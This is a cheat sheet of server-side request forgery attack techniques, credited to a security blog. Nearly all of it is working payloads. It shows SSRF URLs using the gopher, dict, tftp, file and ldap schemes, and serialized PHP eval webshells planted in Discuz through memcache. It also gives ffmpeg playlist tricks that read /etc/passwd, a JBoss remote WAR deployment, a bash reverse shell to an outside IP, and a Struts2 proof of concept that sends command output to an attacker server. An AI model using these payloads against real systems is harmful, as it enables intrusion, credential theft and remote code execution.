SSRF PHP function
|
file_get_contents() fsockopen() curl_exec() |
SFTP
|
http://0cx.cc/ssrf.php?url=sftp://evil.com:11111/evil.com:$ nc -v -l 11111 Connection from [192.168.0.10] port 11111 [tcp/*] accepted (family 2, sport 36136) SSH-2.0-libssh2_1.4.2 |
Dict
|
http://0cx.cc/ssrf.php?dict://attacker:11111/evil.com:$ nc -v -l 11111 Connection from [192.168.0.10] port 11111 [tcp/*] accepted (family 2, sport 36136) CLIENT libcurl 7.40.0 |
gopher
|
// http://0cx.cc/ssrf.php?url=http://evil.com/gopher.php evil.com:# nc -v -l 12346 Listening on [0.0.0.0] (family 0, port 12346) Connection from [192.168.0.10] port 12346 [tcp/*] accepted (family 2, sport 49398) HI Multiline test |
TFTP
|
http://0cx.cc/ssrf.php?url=tftp://evil.com:12346/TESTUDPPACKETevil.com:# nc -v -u -l 12346 Listening on [0.0.0.0] (family 0, port 12346) TESTUDPPACKEToctettsize0blksize512timeout6 |
file
|
http://0cx.cc/redirect.php?url=file:///etc/passwd |
【SSRF Tips】 ldap
|
http://0cx.cc/redirect.php?url=ldap://localhost:11211/%0astats%0aquit |
PHP-FPM universal SSRF bypass safe_mode/disabled_functions/o exploitSSRF memcache Getshell
Generate serialize
|
'@eval($_REQUEST[\'eval\']); '); echo serialize($code)."\n".strlen(serialize($code)); |
Output
|
a:1:{s:12:"global_start"; s:25:"@eval($_REQUEST['eval']); "; } //序列化数据 59//字符串长度 |
webshell.php
|
|
back.php
|
|
open the website
|
http://bbs.0cx.cc/forum.php?mod=ajax&action=downremoteimg&message=[img]http://myvps/webshell.php?logo.jpg[/img] http://bbs.0cx.cc/forum.php?mod=ajax&inajax=yes&action=getthreadtypes |
clear data
|
http://bbs.0cx.cc/forum.php?mod=ajax&action=downremoteimg&message=[img]http://myserver/back.php?logo.jpg[/img] |
backdoor url
|
http://bbs.0cx.cc/data/cache/hello.php |
Generate serialize
|
|
Output
|
a:2:{s:6:"output"; a:1:{s:4:"preg"; a:2:{s:6:"search"; a:1:{s:7:"plugins"; s:5:"/.*/e"; }s:7:"replace"; a:1:{s:7:"plugins"; s:19:"@eval($_POST["c"]); "; }}}s:13:"rewritestatus"; i:1; }//序列化数据 173//字符串长度 |
Open website
|
http://192.168.80.116/forum.php?mod=ajax&action=downremoteimg&message=[img=1,1]http://you-vps-ip/ssrf.php?.jpg[/img]&formhash=818c8f44 |
Backdoor website
|
http://192.168.80.116/forum.php?mod=ajax&inajax=yes&action=getthreadtypes |
cat test.jpg
|
#EXTM3U #EXT-X-MEDIA-SEQUENCE:0 #EXTINF:10.0, concat:http://example.org/header.m3u8|file:///etc/passwd #EXT-X-ENDLIST |
subfile
|
#EXTM3U #EXT-X-MEDIA-SEQUENCE:0 #EXTINF:10.0, concat:http://localhost/header.m3u8|subfile,,start,0,end,64,,:///etc/passwdconcat:http://localhost/header.m3u8|subfile,,start,64,end,128,,:///etc/passwdconcat:http://localhost/header.m3u8|subfile,,start,128,end,256,,:///etc/passwdconcat:http://localhost/header.m3u8|subfile,,start,256,end,512,,:///etc/passwd #EXT-X-ENDLIST |
Exploit
|
> SELECT dblink_send_query('host=127.0.0.1 dbname=quit user=\'\nstats\n\?' password=1 port=11211 sslmode=disable','select version(); '); |
Exploit
|
> db.copyDatabase("\1\2\3\4\5\6\7",'test','localhost:8000') > nc -l 8000 | hexdump -C > db.copyDatabase(“\nstats\nquit”,’test’,’localhost:11211’) |
exploit
|
http://localhost:5984/_users/_all_docs |
|
HTTP/1.1 200 OK Server: CouchDB/1.2.0 (Erlang OTP/R15B01) ETag: "BD1WV12007V05JTG4X6YHIHCA" Date: Tue, 18 Dec 2012 21:39:59 GMT Content-Type: text/plain; charset=utf-8 Cache-Control: must-revalidate{"total_rows":1,"offset":0,"rows":[ {"id":"_design/_auth","key":"_design/_auth","value":{"rev":"1-a8cfb993654bcc635f126724d39eb930"}} ]} |
Attacker could also send requests from CouchDB server to intranet by using replication function
|
POST http://couchdb:5984/_replicate Content-Type: application/json Accept: application/json{ "source" : "recipes", "target" : "http://ssrf-me:11211/recipes", } |
Jbosss POC
|
/jmx-console/HtmlAdaptor?action=invokeOp&name=jboss.system:service=MainDeployer&methodIndex=17&arg0=http://our_public_internet_server/utils/cmd.war |
写入shell
|
http://target.com/ueditor/jsp/getRemoteImage.jsp POST: upfile=http://10.0.0.1:8080/jmx-console/HtmlAdaptor?action=invokeOp%26name=jboss.system%3Aservice%3DMainDeployer%26methodIndex=3%26arg0=http%3A%2F%2F远端地址%2Fhtml5.war%23.jpg |
|
http://target.com/ueditor/jsp/getRemoteImage.jsp POST: upfile=http://内网IP:8080/html5/023.jsp%23.jpg |
reverse shell
|
bash -i >& /dev/tcp/123.45.67.89/9999 0>&1 |
gopher.php
|
|
vuln website
|
https://example.com/uddiexplorer/SearchPublicRegistries.jsp POST: operator=http://vps-ip/gopher.php&rdoSearch=name&txtSearchname=sdf&txtSearchkey=&txtSearchfor=&selfor=Business+location&btnSubmit=Search |
vps
|
> nc -lvv 2333Connection from xx.xx.xx.xx port 2333 [tcp/snapp] accepted |
|
http://www.xxx.com/redirect.php?url=file:///etc/passwd http://www.xxx.com/redirect.php?url=file:///C:/Windows/win.ini |
Struts2-016 POC
|
?redirect:${%23a%3d(new%20java.lang.ProcessBuilder(new%20java.lang.String[]{'command'})).start(),%23b%3d%23a.getInputStream(),%23c%3dnew%20java.io.InputStreamReader(%23b),%23d%3dnew%20java.io.BufferedReader(%23c),%23t%3d%23d.readLine(),%23u%3d"http://SERVER/result%3d".concat(%23t),%23http%3dnew%20java.net.URL(%23u).openConnection(),%23http.setRequestMethod("GET"),%23http.connect(),%23http.getInputStream()} //修改SERVER为你vps地址,返回结果在access.log中查看 |
SSRF_Proxy
ssrfsocks
from:http://blog.safebuff.com/2016/07/03/SSRF-Tips/